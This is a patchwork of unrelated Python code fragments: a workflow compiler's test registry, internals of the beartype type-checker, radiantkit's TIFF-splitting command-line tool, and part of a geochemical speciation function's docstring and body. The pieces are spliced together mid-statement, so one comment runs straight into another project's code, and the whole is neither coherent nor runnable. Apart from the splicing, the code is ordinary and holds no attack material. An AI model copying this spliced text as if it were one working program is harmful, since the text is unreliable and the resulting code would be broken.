"download_from_container", # input file with pairs "echo_pairs", "array_structs", # Missing optional output files, returned as none, instead # of an error "missing_optional_output_file", # calling with an optional argument not specified "scatter_subworkflow_with_optional", # streaming "streaming_inputs", # input/output linear_no_expressions "wf_with_input_expressions", "wf_with_output_expressions", # bug regression tests "nested_pairs", # APPS-370 "apps_378", "apps_384", "diff_stream_and_download", # APPS-288 "apps_573", "apps_612", "nested_optional", "struct_deref", # APPS-615 # manifests "simple_manifest", "complex_manifest", "view_and_count_manifest", # workflow with output files created by expressions "upload_workflow_files" ] wdl_v1_1_list = [ "v1_1_dict", "apps_847_scatter_empty", "optional_missing", "inputs_provided_optional", # bug regression tests "apps_579_boolean_flag_expr", "apps_579_string_substitution_expr" ] # docker image tests docker_test_list = [ "broad_genomics", "biocontainers", "private_registry", "native_docker_file_image", "native_docker_file_image_gzip", "samtools_count", "dynamic_docker_image", "ecr_docker", ] # wdl draft-2 draft2_test_list = [ "advanced", "bad_status", "bad_status2", "just_fail_wf", "call_with_defaults1", "call_with_defaults2", "conditionals_base", "files", "files_with_the_same_name", "hello", "shapes", # this test cannot be enabled yet, because we # don't yet support overriding task inputs # "population", # multiple library imports in one WDL workflow "multiple_imports", # subworkflows "conditionals2", "modulo", "movies", "subblocks2", "subblocks", "var_type_change", "outer", # calling native dx applets/apps # We currently do not have a code generator for draft-2, so cannot import dx_extern.wdl. 
# "call_native", "write_lines_bug", ] single_tasks_list = [ "add3", "diff2files", "empty_stdout", "sort_file", "symlinks_wc", "DiskSpace2", "echo_line_split", "opt_array", "stream_diff_v1", ] cwl_tools = [ "cat", # hello world tool "tar_files", ] cwl_conformance_tools = [ os.path.basename(path)[:-9] for path in glob.glob(os.path.join(test_dir, "cwl_conformance", "tools", "*.cwl.json")) ] cwl_conformance_workflows = [ os.path.basename(path)[:-9] for path in glob.glob(os.path.join(test_dir, "cwl_conformance", "workflows", "*.cwl.json")) ] # Tests run in continuous integration. We remove the native app test, # because we don't want to give permissions for creating platform apps. ci_test_list = [ # WDL tests "advanced", # We currently do not have a code generator for draft-2, so cannot import dx_extern.wdl. # "call_native", "call_with_defaults1", "trains", "files", # CWL tests "cat", ] special_flags_list = [ "add2", # test the ignoreReuse flag "add_many", # tests the delayWorkspaceDestruction flag "inc_range", # check that runtime call to job/analysis pass the delayWorkspaceDestruction flag ] # these are the examples from the documentation doc_tests_list = [ "bwa_mem" ] cromwell_key_error_list = [ "http_inputs", "drs_usa_hca", "drs_usa_jdr", ] # These are cromwell tests that won't run on DNAnexus - see README.txt cromwell_invalid = { "local_backend", "string_interpolation", "call_cache_hit_prefixes", "declarations", "reference_disk_test", "optional_parameter", "sub", "sub_sub", "echo", "sub_workflow_no_output", "recursive_imports", "large_final_workflow_outputs_dir", "input_from_bucket_with_requester_pays", "optional_declarations", "sub_workflow_interactions", "unscattered", "inter_scatter_dependencies", "docker_alpine", "read_write_functions", "afters_and_ifs", "afters", "afters_and_scatters", "custom_cacheworthy_attributes", "input_expressions", "missing_delete", "confirm_preemptible", "call_cache_capoeira_jes", "dedup_localizations_papi_v2", "papi_v2_log", 
"papi_v2_plain_detritus", "call_cache_capoeira_local", "backendWithNoDocker", "docker_image_cache_true", "dummy_scatter", "fofn_caching", "hello_private_repo", "local_bourne", "papi_v2_gcsa", "monitoring_log", "call_cache_capoeira_tes", "check_network_in_vpc", "tmp_dir", "long_cmd", "workbench_health_monitor_check", "monitoring_image_script", "docker_size_dockerhub", "docker_size_gcr", "custom_mount_point", "short_circuit", "top", "recursive_imports_no_subwf", "parallel_composite_uploads_on", "parallel_composite_uploads_off", "default_runtime_attributes", } # tests taken from cromwell repository cromwell_tests_list = [ "null_input_values", "dont_strip_line_prefix", "non_root_default_user", "memory_units", "cacheWithinWF", "dot_dir_stuck_running", "empty_string", "floating_tags", "array_literal_locations", "stdout_delete", "sub_workflow_delete", "no_output_delete", "exhaustive_delete", "scatter_delete", "collections_delete", "hello_delete", "sub_workflow_delete_import", "no_cache_delete", "gcs_path_ending_with_newline", "readFromCache", "sizerelativepath", "subworkflow", "b", "c", "a", "d", "sub_sub_sub", "array_io", "simple_if", "single_to_array_conversion", "coerce_to_array_of_optionals", "wdl_function_locations", "workflow_output_paths", "sub_function", "public_http_import", "control_chars", "prefix", "write_lines_files", "cached_copy", "read_tsv", "custom_entrypoint", "square", "papi_cpu_platform", "complex_types_files", "file_evaluator_identifier_lookups", "non_root_specified_user", "write_lines", "workflow_output_paths_colliding", "jes_labels", "localization_sanity_papi_v2", "recimp_nosubwf_outer", "recimp_nosubwf_inner", "globbingindex", "postfix_quantifiers", "length", "wdl_empty_glob", "output_filename_interpolation", "aliased_subworkflows", "docker_image_cache_false", "curl", "symlink_localization", "error_10_preemptible", "multiline_command_line", "use_cacheCopy_dir", "writeToCache", "cacheBetweenWF", "lots_of_inputs", "local_gcs", 
"read_write_json_roundtrip_develop", "read_write_json_roundtrip", "checkpointing", "cromwell_restart", "space", "arrays_scatters_ifs", "declarations_as_nodes", "variable_scoping", "sub_workflow_decls", "input_mirror", "sub_workflow_hello_world_import", "sub_workflow_hello_world", "volatile_disables_cache", "file_outputs_from_input", "write_tsv", "final_call_logs_dir", "subdirectory", "input_localization", "scattered", "filearrayoutput", "array_io", "docker_hash_quay", "docker_hash_gcr", "workflow_type_and_version_wdl", "dontglobinputs", "globbingscatter", "ifs_in_scatters", "nested_lookups", "simple_if", "declarations_in_ifs", "lots_of_nesting", "ifs_upstream_and_downstream", "subworkflows_in_ifs", "scatters_in_ifs", "simple_if_workflow_outputs", "scattergather", "map_workflow", "forkjoin", "scatter_chain", "output_redirection", "workflowenginefunctions", "stdout_stderr_passing", "scatter", "siblings_scatter", "simple_scatter", "prepare_scatter_gather", "multiplesourcedarray", "passingfiles", "referencingpreviousinputsandoutputs", "engine_functions", #"string_interpolation_optional", # pending wdlTools 170 #"none_literal", # pending wdlTools 170 "sub_workflow_interactions_scatter", "sub_workflow_one_output_import", "sub_workflow_var_refs", "sub_workflow_var_refs_import", #"globbingBehavior", # pending dxCompiler 87 #"object_access", # pending wdlTools 171 #"read_write_json", # pending wdlTools 171 "no_task_no_output_delete", "if_then_else_expressions", "sub_workflow_no_output_block_import", "sub_workflow_no_outputs_in_block_import", "sub_workflow_interactions_import", "workflow_output_declarations", "member_access", "select_functions", "dollars_in_strings", "workflow_name_length_ok", "importer_ok", "read_write_map", "docker_image_cache_unspecified", "subworkflow", "defined_function", "workflow_engine_functions", "empty_scatter", "continue_on_return_code", "exit", ] # these are tests that take a long time to run long_test_list = [ "diskspace_exhauster" # APPS-749 ] 
medium_test_list = ( wdl_v1_list + wdl_v1_1_list + docker_test_list + special_flags_list + cwl_tools ) large_test_list = ( medium_test_list + draft2_test_list + single_tasks_list + doc_tests_list + long_test_list + cwl_conformance_tools + cwl_conformance_workflows + cromwell_tests_list ) test_suites = { "CI": ci_test_list, "M": medium_test_list, "L": large_test_list, "tasks": single_tasks_list, "draft2": draft2_test_list, "docker": docker_test_list, "native": ["call_native", "call_native_v1"], "docs": doc_tests_list, "cwl_tools": cwl_conformance_tools, "cwl_workflows": cwl_conformance_workflows, 'cromwell': cromwell_tests_list, } # Tests with the reorg flags test_reorg = { "dict", "strings", "test_reorg", "test_reorg_no_config" } test_defaults = set() test_unlocked = { "array_structs", "cast", "call_with_defaults1", "files", "hello", "path_not_taken", "optionals", "shapes", "population" } test_project_wide_reuse = { "add2", "add_many" } test_separate_outputs = { "localization" } test_import_dirs = ["A"] TestMetaData = namedtuple("TestMetaData", ["name", "kind"]) TestDesc = namedtuple( "TestDesc", ["name", "kind", "source_file", "raw_input", "dx_input", "results", "extras"], ) # Test with -waitOnUpload flag test_upload_wait = { "upload_wait" } # use the applet's default instance type rather than the default (mem1_ssd1_x4) test_instance_type = ["diskspace_exhauster"] # Read a JSON file def read_json_file(path): with open(path, "r") as fd: data = fd.read() d = json.loads(data) return d def verify_json_file(path): try: read_json_file(path) except: raise RuntimeError("Error verifying JSON file {}".format(path)) # Search a WDL file with a python regular expression. # Note this is not 100% accurate. # # Look for all tasks and workflows. If there is exactly # one workflow, this is a WORKFLOW. If there are no # workflows and exactly one task, this is an APPLET. 
task_pattern_re = re.compile(r"^(task)(\s+)(\w+)(\s+){") wf_pattern_re = re.compile(r"^(workflow)(\s+)(\w+)(\s+){") def get_wdl_metadata(filename): workflows = [] tasks = [] with open(filename, "r") as fd: for line in fd: m = re.match(wf_pattern_re, line) if m is not None: workflows.append(m.group(3)) m = re.match(task_pattern_re, line) if m is not None: tasks.append(m.group(3)) if len(workflows) > 1: raise RuntimeError("WDL file {} has multiple workflows".format(filename)) if len(workflows) == 1: return TestMetaData(name=workflows[0], kind="workflow") assert len(workflows) == 0 if len(tasks) == 1: return TestMetaData(name=tasks[0], kind="applet") if os.path.basename(filename).startswith("library") or os.path.basename( filename ).endswith("_extern"): return raise RuntimeError( "{} is not a valid WDL test, #tasks={}".format(filename, len(tasks)) ) def get_cwl_metadata(filename, tname): with open(filename, "r") as fd: doc = yaml.safe_load(fd) if doc["class"] == "CommandLineTool": name = doc.get("id", tname) return TestMetaData(name=name, kind="applet") raise RuntimeError("{} is not a valid CWL tool test".format(filename)) def get_cwl_json_metadata(filename, tname): with open(filename, 'r') as fd: doc = json.load(fd) if "class" in doc: # the id in a packed CWL file is always "main" so we use the test name instead if doc["class"] == "Workflow": return TestMetaData(name=tname, kind="workflow") elif doc["class"] == "CommandLineTool": return TestMetaData(name=tname, kind="applet") elif "$graph" in doc: for proc in doc["$graph"]: if proc["id"] == "#main": if proc["class"] == "Workflow": return TestMetaData(name=tname, kind="workflow") else: break raise RuntimeError("{} is not a valid CWL workflow test".format(filename)) # Register a test name, find its inputs and expected results files. 
def register_test(dir_path, tname, ext):
    """Register a test called *tname* located under *dir_path*.

    Finds the test source file (``<tname><ext>``), derives its metadata, and
    collects any input/result/extras files that follow the project naming
    conventions.  The resulting TestDesc is recorded in the module-level
    ``test_files`` registry and returned.

    Raises RuntimeError if the name collides with a test-suite alias, the
    source file is missing, or the extension is unsupported.
    """
    # Suite aliases (e.g. "M", "L") are reserved and cannot name a test.
    if tname in test_suites:
        raise RuntimeError(
            "Test name {} is already used by a test-suite, it is reserved".format(tname)
        )
    source_file = os.path.join(dir_path, tname + ext)
    if not os.path.exists(source_file):
        raise RuntimeError("Test file {} does not exist".format(source_file))

    if ext == ".wdl":
        metadata = get_wdl_metadata(source_file)
    elif ext == ".cwl":
        metadata = get_cwl_metadata(source_file, tname)
    elif ext == ".cwl.json":
        metadata = get_cwl_json_metadata(source_file, tname)
    else:
        raise RuntimeError("unsupported file type {}".format(ext))

    # NOTE(review): get_wdl_metadata may return None for library/extern
    # files; callers are assumed never to register those here.
    desc = TestDesc(
        name=metadata.name,
        kind=metadata.kind,
        source_file=source_file,
        raw_input=[],
        dx_input=[],
        results=[],
        extras=None,
    )

    # Verify the primary input file, and add it (if it exists)
    test_input = os.path.join(dir_path, tname + "_input.json")
    if os.path.exists(test_input):
        verify_json_file(test_input)
        desc.raw_input.append(test_input)
        desc.dx_input.append(os.path.join(dir_path, tname + "_input.dx.json"))
        desc.results.append(os.path.join(dir_path, tname + "_results.json"))

    # Alternate naming scheme for tests with multiple inputs:
    # <tname>_input1.json, <tname>_input2.json, ...
    i = 1
    while True:
        test_input = os.path.join(dir_path, tname + "_input{}.json".format(i))
        if not os.path.exists(test_input):
            break
        verify_json_file(test_input)
        desc.raw_input.append(test_input)
        desc.dx_input.append(
            os.path.join(dir_path, tname + "_input{}.dx.json".format(i))
        )
        desc.results.append(
            os.path.join(dir_path, tname + "_results{}.json".format(i))
        )
        i += 1

    # Add an extras file (if it exists)
    extras = os.path.join(dir_path, tname + "_extras.json")
    if os.path.exists(extras):
        desc = desc._replace(extras=extras)

    test_files[tname] = desc
    return desc


######################################################################
# Same as above, however, if a file
Since # the get_next_pep_hint_child_str() method increments *BEFORE* # stringifying this ID, initializing this ID to -1 ensures that method # returns a string containing only non-negative substrings starting at # 0 rather than both negative and positive substrings starting at -1. hint_child_placeholder_id = -1 #FIXME: Excise us up. # Python expression evaluating to the value of the currently iterated child # hint of the currently visited parent hint. # hint_child_expr = None #FIXME: Excise us up. # Origin type (i.e., non-"typing" superclass suitable for shallowly # type-checking the current pith against the currently visited hint by # passing both to the isinstance() builtin) of the currently iterated child # hint of the currently visited parent hint. # hint_child_type_origin = None #FIXME: Excise us up. # Python code snippet evaluating to the current (possibly nested) object of # the passed parameter or return value to be type-checked against the # currently iterated child hint. #pith_child_expr = None # Python code snippet expanding to the current level of indentation # appropriate for the currently iterated child hint, initialized to the # root hint indentation to enable the subsequently called # _enqueue_hint_child() function to enqueue the root hint. indent_child = indent_curr # ..................{ HINT ~ childs }.................. # Current tuple of all PEP-compliant child hints subscripting the currently # visited hint (e.g., "(int, str)" if "hint_curr == Union[int, str]"). hint_childs: tuple = None # type: ignore[assignment] # Number of PEP-compliant child hints subscripting the currently visited # hint. hint_childs_len: int = None # type: ignore[assignment] # Set of all PEP-noncompliant child hints subscripting the currently # visited hint. hint_childs_nonpep: set = None # type: ignore[assignment] # Set of all PEP-compliant child hints subscripting the currently visited # hint. 
hint_childs_pep: set = None # type: ignore[assignment] # ..................{ HINT ~ pep 484 : forwardref }.................. # Set of the unqualified classnames referred to by all relative forward # references visitable from this root hint if any *OR* "None" otherwise # (i.e., if no such forward references are visitable). hints_forwardref_class_basename: set = None # type: ignore[assignment] # Possibly unqualified classname referred to by the currently visited # forward reference type hint. hint_curr_forwardref_classname: str = None # type: ignore[assignment] # ..................{ HINT ~ pep 572 }.................. # The following local variables isolated to this subsection are only # relevant when these conditions hold: # # * The active Python interpreter targets at least Python 3.8, the first # major Python version to introduce support for "PEP 572 -- Assignment # Expressions." # * The currently visited hint is *NOT* the root hint (i.e., "hint_root"). # If the currently visited hint is the root hint, the current pith has # already been localized to a local variable whose name is the value of # the "VAR_NAME_PITH_ROOT" string global and thus need *NOT* be # relocalized to another local variable using an assignment expression. # # This is a necessary and sufficient condition for deciding whether a # Python >= 3.8-specific assignment expression localizing the current pith # should be embedded in the code generated to type-check this pith against # this hint. This is a non-trivial runtime optimization eliminating # repeated computations to obtain this pith from PEP-compliant child hints. 
# For example, if this hint constrains this pith to be a standard sequence, # the child pith of this parent pith is a random item selected from this # sequence; since obtaining this child pith is non-trivial, the computation # required to do so is performed only once by assigning this child pith to # a unique local variable during runtime type-checking and then repeatedly # type-checking that variable rather than the computation required to # continually reacquire this child pith: e.g., # # # Type-checking conditional for "List[List[str]]" under Python < 3.8. # if not ( # isinstance(__beartype_pith_0, list) and # ( # isinstance(__beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)], list) and # isinstance(__beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)][__beartype_random_int % len(__beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)])], str) if __beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)] else True # ) if __beartype_pith_0 else True # ): # # # The same conditional under Python < 3.8. # if not ( # isinstance(__beartype_pith_0, list) and # ( # isinstance(__beartype_pith_1 := __beartype_pith_0[__beartype_random_int % len(__beartype_pith_0)], list) and # isinstance(__beartype_pith_1[__beartype_random_int % len(__beartype_pith_1)], str) if __beartype_pith_1 else True # ) if __beartype_pith_0 else True # ): # # Note the localization of the random item selection from the root pith # (i.e., "__beartype_pith_1 := __beartype_pith_0[__beartype_random_int % # len(__beartype_pith_0)"), which only occurs once in the latter case # rather than repeatedly as in the former case. In both cases, the same # semantic type-checking is performed regardless of optimization. # # Note this optimization implicitly "bottoms out" when the currently # visited hint is *NOT* subscripted by one or more non-ignorable # PEP-compliant child hint arguments, as desired. 
If all child hints of the # currently visited hint are either ignorable (e.g., "object", "Any") *OR* # are non-ignorable non-"typing" types (e.g., "int", "str"), the currently # visited hint has *NO* meaningful PEP-compliant child hints and is thus # effectively a leaf node with respect to performing this optimization. # is_pith_curr_assign_expr = None # Integer suffixing the name of each local variable assigned the value of # the current pith in a Python >= 3.8-specific assignment expression, thus # uniquifying this variable in the body of the current wrapper function. # # Note that this integer is intentionally incremented as an efficient # low-level scalar rather than an inefficient high-level # "itertools.counter" object. Since both are equally thread-safe in the # internal context of this function body, the former is preferable. pith_curr_assign_expr_name_counter = 0 # Python >= 3.8-specific assignment expression assigning this full Python # expression to the local variable assigned the value of this expression. pith_curr_assign_expr: str = None # type: ignore[assignment] # Name of the local variable uniquely assigned to by # "pith_curr_assign_expr". Equivalently, this is the left-hand side (LHS) # of that assignment expression. pith_curr_assigned_expr: str = None # type: ignore[assignment] # ..................{ HINT ~ label }.................. # Human-readable label prefixing the machine-readable representation of the # currently visited type hint if this hint is nested (i.e., any hint # *except* the root type hint) in exception and warning messages. # # Note that "hint_curr_label" should almost *ALWAYS* be used instead. HINT_CHILD_LABEL = f'{_HINT_ROOT_LABEL} {repr(hint_root)} child' # Human-readable label prefixing the machine-readable representation of the # currently visited type hint in exception and warning messages. hint_curr_label: str = None # type: ignore[assignment] # ..................{ METADATA }.................. 
# Tuple of metadata describing the currently visited hint, appended by # the previously visited parent hint to the "hints_meta" stack. hint_curr_meta: tuple = None # type: ignore[assignment] # Fixed list of all metadata describing all visitable hints currently # discovered by the breadth-first search (BFS) below. This list acts as a # standard First In First Out (FILO) queue, enabling this BFS to be # implemented as an efficient imperative algorithm rather than an # inefficient (and dangerous, due to both unavoidable stack exhaustion and # avoidable infinite recursion) recursive algorithm. # # Note that this list is guaranteed by the previously called # _die_if_hint_repr_exceeds_child_limit() function to be larger than the # number of hints transitively visitable from this root hint. Ergo, *ALL* # indexation into this list performed by this BFS is guaranteed to be safe. # Ergo, avoid explicitly testing below that the "hints_meta_index_last" # integer maintained by this BFS is strictly less than "SIZE_BIG", as this # constraint is already guaranteed to be the case. hints_meta = acquire_fixed_list(SIZE_BIG) # 0-based index of metadata describing the currently visited hint in the # "hints_meta" list. hints_meta_index_curr = 0 # 0-based index of metadata describing the last visitable hint in the # "hints_meta" list, initialized to "-1"
<reponame>ggirelli/radiantkit """ @author: <NAME> @contact: <EMAIL> """ import argparse import configparser as cp import logging import numpy as np # type: ignore import os import radiantkit as ra from radiantkit import argtools as ap from radiantkit import image as imt from rich.progress import track # type: ignore from rich.prompt import Confirm # type: ignore import sys from typing import Iterable, Iterator, List, Tuple def init_parser(subparsers: argparse._SubParsersAction) -> argparse.ArgumentParser: parser = subparsers.add_parser( __name__.split(".")[-1], description=""" Split a TIFF image in smaller TIFF images of the specified side(s). If two different sides are provided, the smaller images will be rectangular. The first side corresponds to the X (columns) and the second to the Y (rows). By default, only one side is required, which is used by the script for both X and Y sides. In other words, square smaller images are produced. If the original dimensions are not multiples of the specified side, a portion of the image is lost, unless the --enlarge option is used. In that case, the smaller images generated from the image border will contain empty pixels. If the input image is a 3D stack, it will be split only on XY and the output images will have the same number of slices. Using the --slice option, it is possible to specify which slice to split (i.e., the output will be in 2D). Defaults to first slice (--slice 0). It is also possible to generate overlapping split images. This can be achieved by using either the -S or -O options (which cannot be used together). With the -S option, you can specify the step used when splitting the image, as a fraction of its sides or as an absolute number of pixels. With the -O option, you can specify the overlapping region between consecutive split images as a fraction of their sides or as absolute pixels. In other words, the options -S 0.9 and -O 0.1 yield the same result. 
It is possible to provide two values to -S and -O, to obtain different overlaps in X and Y. By default, split images are generated left-to-right, top-to-bottom, e.g., 1 2 3 4 5 6 7 8 9 Use the option -I to generate them top-to-bottom, left-to-right, e.g., 1 4 7 2 5 8 3 6 9 Examples: - Square images of 100x100 px tiff_split big_image.tif split_out_dir 100 -e - Rectangular images of 125x100 px tiff_split big_image.tif split_out_dir 100 125 -e - Square images of 100x100 px, overlapping for 10 px in X and Y tiff_split big_image.tif split_out_dir 100 -e -S 0.9 tiff_split big_image.tif split_out_dir 100 -e -S 90 tiff_split big_image.tif split_out_dir 100 -e -O 0.1 tiff_split big_image.tif split_out_dir 100 -e -O 10 - Square images of 100x100 px, overlapping for 10 px in X and 20 px in Y tiff_split big_image.tif split_out_dir 100 -e -S 0.9 0.8 tiff_split big_image.tif split_out_dir 100 -e -S 90 80 tiff_split big_image.tif split_out_dir 100 -e -O 0.1 0.2 tiff_split big_image.tif split_out_dir 100 -e -O 10 20""", formatter_class=argparse.RawDescriptionHelpFormatter, help="Split a TIFF image in smaller images of the specified side(s).", ) parser.add_argument("input", type=str, help="""Path to the TIFF image to split.""") parser.add_argument( "outdir", type=str, help="""Path to output TIFF folder, created if missing.""" ) parser.add_argument( "side", type=int, nargs="+", help="""One or two (XY) sides, used to specify the smaller images dimensions.""", ) parser.add_argument( "--step", metavar="NUMBER", type=float, nargs="+", help="""Step for splitting, defined as a fraction of the specified side(s).""", ) parser.add_argument( "--overlap", metavar="NUMBER", type=float, help="""Overlap fraction of splitted images, defined as a fraction of the specified side(s).""", nargs="+", ) parser.add_argument( "--slice", metavar="NUMBER", type=int, help="""ID of slice to be extracted from Z-stacks, 1-indexed.""", ) parser.add_argument( "--enlarge", action="store_const", dest="enlarge", 
const=True, default=False, help="Expand to avoid pixel loss.", ) advanced = parser.add_argument_group("advanced arguments") advanced.add_argument( "--invert", action="store_const", dest="inverted", const=True, default=False, help="""Split top-to-bottom, left-to-right.""", ) advanced.add_argument( "-y", "--do-all", action="store_const", help="""Do not ask for settings confirmation and proceed.""", const=True, default=False, ) parser = ap.add_version_argument(parser) parser.set_defaults(parse=parse_arguments, run=run) return parser def update_args_from_step( args: argparse.Namespace, relative_steps: bool ) -> Tuple[argparse.Namespace, bool]: assert all([step > 0 for step in args.step]) step_is_relative = all([step <= 1 for step in args.step]) step_is_absolute = all([step > 1 for step in args.step]) assert step_is_absolute or step_is_relative while len(args.step) < len(args.side): args.step.append(args.step[0]) args.step = args.step[: len(args.side)] if step_is_absolute: relative_steps = False args.overlap = np.array( [args.side[i] - args.step[i] for i in range(len(args.step))] ).astype("int") elif step_is_relative: args.overlap = [np.round(1 - s, 3) for s in args.step] return args, relative_steps def update_args_from_overlap( args: argparse.Namespace, relative_steps: bool ) -> Tuple[argparse.Namespace, bool]: assert all([overlap >= 0 for overlap in args.overlap]) overlap_is_relative = all([overlap < 1 for overlap in args.overlap]) overlap_is_absolute = all([overlap > 1 for overlap in args.overlap]) assert overlap_is_absolute or overlap_is_relative while len(args.overlap) < len(args.side): args.overlap.append(args.overlap[0]) args.overlap = args.overlap[: len(args.side)] if overlap_is_absolute: relative_steps = False args.step = np.array( [args.side[i] - args.overlap[i] for i in range(len(args.overlap))] ).astype("int") elif overlap_is_relative: args.overlap = [np.round(1 - s, 3) for s in args.overlap] return args, relative_steps def check_step_and_overlap(args: 
argparse.Namespace) -> argparse.Namespace: relative_steps = True if args.step is not None: args, relative_steps = update_args_from_step(args, relative_steps) if args.overlap is not None: args, relative_steps = update_args_from_overlap(args, relative_steps) if (args.overlap is not None or args.step is not None) and relative_steps: args.step = np.array( [np.round(args.side[i] * args.step[i]) for i in range(len(args.step))] ).astype("int") args.overlap = np.array( [np.round(args.side[i] * args.overlap[i]) for i in range(len(args.overlap))] ).astype("int") return args def parse_arguments(args: argparse.Namespace) -> argparse.Namespace: args.version = ra.__version__ assert os.path.isfile(args.input), "input file not found: %s" % args.input assert not os.path.isfile( args.outdir ), f"output directory cannot be a file: {args.outdir}" if 1 == len(args.side): args.side = (args.side[0], args.side[0]) else: args.side = args.side[:2] if args.slice is not None: assert args.slice > 0 assert not ( args.step is not None and args.overlap is not None ), "-S and -O are incompatible" args = check_step_and_overlap(args) if not os.path.isdir(args.outdir): os.mkdir(args.outdir) return args def enlarge_XY_tiff(img: np.ndarray, offset: List[int]) -> np.ndarray: new_shape = list(img.shape) new_shape[-1] += int(offset[0]) new_shape[-2] += int(offset[1]) new_image = img.copy() new_image = np.zeros(new_shape) new_image[np.ix_(*[range(img.shape[i]) for i in range(len(img.shape))])] = img return new_image def get_pixel_loss( img: np.ndarray, side: List[int], step: List[float] ) -> Tuple[int, int, int, float]: N = len(img.shape) assert len(side) <= N if step is None: missed = [int(img.shape[-i - 1] % side[i]) for i in range(len(side))] else: assert len(side) == len(step) missed = [int(img.shape[-i - 1] % side[i] % step[i]) for i in range(len(side))] lost_parts = [] for i in range(len(side)): otherd = [img.shape[j] for j in range(N) if not N - i - 1 == j] otherd.append(missed[-i - 1]) 
lost_parts.append(np.prod(otherd)) loss = int(np.sum(lost_parts) - np.prod(img.shape[:-2]) * np.prod(missed)) return (missed[0], missed[1], loss, float(loss / np.prod(img.shape) * 100)) def init_xy( img: np.ndarray, step: List[int], side: List[int], inverted: bool = False ) -> Iterable[Tuple[int, int]]: ys = [y for y in range(0, img.shape[-2], step[1]) if y + side[1] <= img.shape[-2]] xs = [x for x in range(0, img.shape[-1], step[0]) if x + side[0] <= img.shape[-1]] if inverted: logging.info("Image split top-to-bottom, left-to-right.") xy_gen = ((x, y) for x in xs for y in ys) else: logging.info("Image split left-to-right, top-to-bottom.") xy_gen = ((x, y) for y in ys for x in xs) return xy_gen def tsplit3d(img: np.ndarray, x: int, y: int, s: List[int]) -> np.ndarray: return img[:, slice(y, (y + s[1])), slice(x, (x + s[0]))] def tsplit2d(img: np.ndarray, x: int, y: int, s: List[int]) -> np.ndarray: return img[slice(y, (y + s[1])), slice(x, (x + s[0]))] tsplit_fun = {2: tsplit2d, 3: tsplit3d} def tiff_split( img: np.ndarray, side: List[int], step: List[int], inverted: bool = False ) -> Iterator: n = (img.shape[-1] // side[0]) * (img.shape[-2] // side[1]) logging.info(f"Output {n} images.") assert 0 != n xy_gen = init_xy(img, step, side, inverted) if not len(img.shape) in [2, 3]: logging.error("cannot split images with more than 3 dimensions.") raise ValueError for (x_start, y_start) in track(xy_gen): yield tsplit_fun[len(img.shape)](img, x_start, y_start, side) def print_settings(args: argparse.Namespace, clear: bool = True) -> None: settings_string = f""" # TIFF split v{args.version} Input file : {args.input} Output directory : {args.outdir} X side : {args.side[0]} Y side : {args.side[1]} Overlap : {args.overlap} Step : {args.step} Slice : {args.slice} Enlarge : {args.enlarge} Inverted : {args.inverted} """ if clear: settings_string = f"\033[H\033[J{settings_string}" print(settings_string) def save_settings(args: argparse.Namespace) -> None: config = 
cp.ConfigParser() config["MAIN"] = dict(input=args.input, outdir=args.outdir) config["ADVANCED"] = dict( x_side=str(args.side[0]), y_side=str(args.side[1]), slice=str(args.slice), enlarge=str(args.enlarge), inverted=str(args.inverted), ) if args.step is not None: config["ADVANCED"].update( dict(x_step=str(args.step[0]), y_step=str(args.step[1])) ) with open(os.path.join(args.outdir, "config.ini"), "w") as CF: config.write(CF) def confirm_arguments(args: argparse.Namespace) -> None:
Ignored if `get_mineral_sat` is False. get_redox : bool, default True Calculate potentials of redox couples? redox_type : str, default "Eh" Desired units of measurement for reported redox potentials. Can be "Eh", "pe", "logfO2", or "Ah". Ignored if `get_redox` is False. get_ion_activity_ratios : bool, default True Calculate ion/H+ activity ratios and neutral species activities? get_fugacity : bool, default True Calculate gas fugacities? get_basis_totals : bool, default True Report total compositions of basis aqueous species? get_solid_solutions : bool, default True Permit the calculation of solid solutions and include them in the speciation report? get_affinity_energy : bool, default False Calculate affinities and energy supplies of reactions listed in a separate user-supplied file? negative_energy_supplies : bool, default False Report negative energy supplies? If False, negative energy supplies are reported as 0 cal/kg H2O. If True, negative energy supplies are reported. A 'negative energy supply' represents the energy cost of depleting the limiting reactant of a reaction. This metric is not always helpful when examining energy supply results, so this option is set to False by default. rxn_filename : str, optional Name of .txt file containing reactions used to calculate affinities and energy supplies. Ignored if `get_affinity_energy` is False. not_limiting : list, default ["H+", "OH-", "H2O"] List containing names of species that are not considered limiting when calculating energy supplies. Ignored if `get_affinity_energy` is False. get_charge_balance : bool, default True Calculate charge balance and ionic strength? custom_data0 : bool, default False Deprecated. custom_db : bool, default False Deprecated. batch_3o_filename : str, optional Name of rds (R object) file exported after the speciation calculation? No file will be generated if this argument is not defined.
delete_generated_folders : bool, default False Delete the 'rxn_3i', 'rxn_3o', 'rxn_3p', and 'eqpt_files' folders containing raw EQ3NR input, output, pickup, and EQPT files once the speciation calculation is complete? custom_obigt : str, optional Deprecated. db_args : dict, default {} Dictionary of arguments to modify how the thermodynamic database is processed. Only used when `db` points to thermodynamic data in a CSV file. Ignored if `db` points to a data0 file (because a data0 file is already ready for a speciation calculation). Options for `db_args` are passed to the `create_data0` function, so refer to `create_data0` for more information about what options are possible. - Example of `db_args` where organics are excluded and redox is suppressed for Fe and S: db_args = { "exclude_category":{"category_1":["organic_aq"]}, "suppress_redox":["Fe", "S"], } Returns ------- speciation : object of class Speciation Contains the results of the speciation calculation. """ if custom_db == True: print("Warning: the parameter 'custom_db' is deprecated. " "Specify a custom data0 file with the 'db' parameter.") if custom_data0 == True: print("Warning: the parameter 'custom_data0' is deprecated. " "Specify a custom data0 file with the 'db' parameter.") if custom_obigt != None: print("Warning: the parameter 'custom_obigt' is deprecated. Specify " "a custom thermodynamic database with the 'db' parameter. If " "a database is needed for affinity and energy calculations, " "use the parameter 'rxn_filename' to specify a CSV file of " "thermodynamic data or a TXT file with desired reactions.") if len(db) == 3: # e.g., "wrm" custom_data0 = False data0_lettercode = db.lower() dynamic_db = False # search for a data1 file in the eq36da directory if os.path.exists(self.eq36da + "/data1." + db) and os.path.isfile(self.eq36da + "/data1." + db): self.thermo_db = None self.thermo_db_type = "data1 file" self.thermo_db_filename = "data1."+db elif os.path.exists("data0." 
